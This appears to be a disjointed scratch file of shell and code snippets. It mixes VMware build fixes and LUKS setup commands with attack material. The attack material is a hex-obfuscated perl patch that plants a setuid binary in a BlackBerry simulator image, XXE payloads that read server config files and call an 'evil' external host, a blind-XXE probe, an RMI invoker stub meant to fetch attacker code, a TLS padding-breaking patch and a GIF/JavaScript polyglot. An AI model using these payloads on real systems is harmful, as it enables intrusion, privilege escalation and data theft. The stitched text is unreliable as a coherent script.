#!/bin/bash
if [ "$1" != "" ]; then
    USERNAME=$1
else
    echo "ERROR: no username supplied"
    echo "Using current user"
    USERNAME=`whoami`
fi
# Ensure all kernel headers are installed
yum install kernel-devel kernel-headers
# Make a copy of version.h to a location known to VMware
cp /usr/src/kernels/`uname -r`/include/generated/uapi/linux/version.h /lib/modules/`uname -r`/build/include/linux/
# Fix vmnet build
cd /usr/lib/vmware/modules/source/
curl http://pastie.org/pastes/8672356/download -o vmware-netfilter.patch
tar xf vmnet.tar
vmware-installer -u vmware-player
http://dandar3.blogspot.cz/2014/01/vmware-player-601-on-ubuntu-1404-alpha.html
#create new file to use as container
#dd if=/dev/zero of=/out count=5000k
fallocate -l 1G /out
#create luks wrapper
cryptsetup -v -y luksFormat /out
cryptsetup luksOpen /out cryptname
cryptsetup -v status cryptname
#make into filesystem
perl -i.backup -0777 -pe 's/\x69\x66\x20\x5b\x20\x22\x24\x7b\x42\x4f\x41\x52\x44\x5f\x43\x4f\x4e\x46\x49\x47\x7d\x22\x20\x21\x3d\x20\x22\x64\x65\x76\x65\x6c\x6f\x70\x65\x72\x22\x20\x5d\x3b\x20\x74\x68\x65\x6e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x6d\x20\x2d\x72\x66\x20\x2f\x72\x6f\x6f\x74\x2f\x2e\x20\x3e\x20\x2f\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x32\x3e\x26\x31\x3b\x0a\x20\x20\x20\x20\x66\x69\x3b/\x63\x70\x20\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x73\x65\x74\x75\x69\x64\x67\x69\x64\x20\x2f\x74\x6d\x70\x20\x26\x26\x20\x63\x68\x6d\x6f\x64\x20\x36\x37\x35\x35\x20\x2f\x74\x6d\x70\x2f\x73\x65\x74\x75\x69\x64\x67\x69\x64\x3b\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20/g' BlackBerry10Simulator-s001.vmdk |
Payload:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY % start "<![CDATA[">
<!ENTITY % stuff SYSTEM "file:///usr/local/tomcat/webapps/customapp/WEB-INF/applicationContext.xml ">
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "http://evil/evil.xml">
%dtd;
]>
#!/usr/bin/python
"""
Python implementation of RMI invoker. Should try fetch a .jar from a server we control.
Author: Etienne Stalmans <etienne@sensepost.com>
Version: 08/10/2014 - v0.1
"""
import socket
import binascii
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
diff -u -r b/src/pkg/crypto/tls/common.go a/src/pkg/crypto/tls/common.go | |
--- b/src/pkg/crypto/tls/common.go 2014-10-01 02:51:45.000000000 +0100 | |
+++ a/src/pkg/crypto/tls/common.go 2014-12-09 13:55:55.167748499 +0000 | |
@@ -301,6 +301,8 @@ | |
// be used. | |
CurvePreferences []CurveID | |
+ BreakCBCPadding bool | |
+ | |
serverInitOnce sync.Once // guards calling (*Config).serverInit |
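Review bot: the new exported field `BreakCBCPadding bool` in the Config struct has no doc comment, while the `CurvePreferences` field directly above it is documented. Add a comment stating exactly what the TLS stack does when it is true and that it exists only for testing how a peer handles malformed CBC padding. Because the name says it deliberately breaks padding, consider keeping it out of the public Config (unexported, or behind a build tag) so a production build cannot set it by accident.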
0000000: 4749 4638 3961 2f2a 0a00 00ff 002c 0000 GIF89a/*.....,..
0000010: 0000 2f2a 0a00 0002 003b 2a2f 3d31 3b61 ../*.....;*/=1;a
0000020: 6c65 7274 2822 4865 6c6c 6f22 293b lert("Hello");